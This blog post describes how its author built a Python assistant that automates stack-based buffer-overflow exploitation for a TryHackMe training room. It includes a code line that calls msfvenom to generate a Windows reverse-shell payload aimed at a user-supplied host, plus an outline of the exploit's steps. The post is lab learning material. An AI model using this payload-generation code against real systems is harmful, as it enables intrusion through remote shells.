Automation of Buffer-Overflow

Code Explanation of my Stack-Based Buffer-Overflow Assitant Program in Python

Pak Cyberbot
InfoSec Write-ups


In this article, I am not teaching about Buffer-Overflow or not showing the demonstration of my Buffer-Overflow Assitant program written in python. I am going to talk about How I created this program.

How I got an Idea for this Project?

I was doing TryHackme Room on Buffer-Overflow. Where I have to solve the 10 tasks on it.

I did the first task manually by understanding each step to do stack-based buffer overflow exploitation. Thanks to Tib3rius for this room and his repository about buffer overflow. After getting a good hold on the steps, I thought to complete the remaining 9 tasks with my Buffer-Overflow Assistant so I gave time to create it.

It’s better to give 4 hours creating or learning new things than to do 2 hours of repetitive tasks.

Code Explanation

I reused the Fuzzing and Exploit Code from Tib3rius in my Program and then First worked on the color scheme and simple intro of the program. After that, I used pyperclip module in order to automatically copy the mona commands for the user so that they can be directly pasted.

I used different color schemes for the different tasks so that eyes can catch them quickly.

GREEN : Text that is copied automatically to your Clipboard
BLUE : Takes Input from the User
RED : Alerts the User to Restart the Vulnerable Application in Immunity Debugger before going further

I also used os.popen() in order to generate the payloads from Metasploit by the program and use it in the code itself.

Bofy using pattern_create ruby script
Bofy using msfvenom to generate a payload

When MsfVenom generates the payload, It gives some extra characters as the output that are not intended for the payload. So I used grep and tr Linux command to filter out only hex data.

# filter out the payload using grep and trpayload = os.popen(f"msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} EXITFUNC=thread -b \"{badchars}\" -f c | grep -oe  '\"[\\\\0-9a-z]*\"' | tr -d '\"' | tr -d \"\\n\"").read()

Whenever a python program takes input from stdin, it escapes \ characters which means:

payload = input('Value in hex : ')      #Value in hex : \x63
# payload = '\\x61' whereas I have to give same as the input so
payload = payload.encode('utf-8').decode('unicode_escape')
# payload = '\x61' hex in 61 is 'a' in ascii

Exploit() method simple summary:

  • To find EIP offset (payload = Generated_Pattern)
  • To test the EIP offset (offset = <offset of EIP> & retn = ‘BBBB’)
  • To find the BadChars (payload = byte_array)
  • To find the Jump Point(retn = Jump_Point_Address)
  • Exploitation(payload = msfvenom_payload)

(Updated) Result Of My Program:

After completing the program, I used it to solve the remaining 9 tasks. It took only 15 mins to complete the 9 tasks.😎

Note: I didn’t write the code to verify the bad chars removal. This program might have some bugs and hasn’t many features yet. You can report the bug on my GitHub and collaboration is appreciated.

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I hope you learned something new from this article. Feedback or Constructive Criticism is appreciated in the comment section below!

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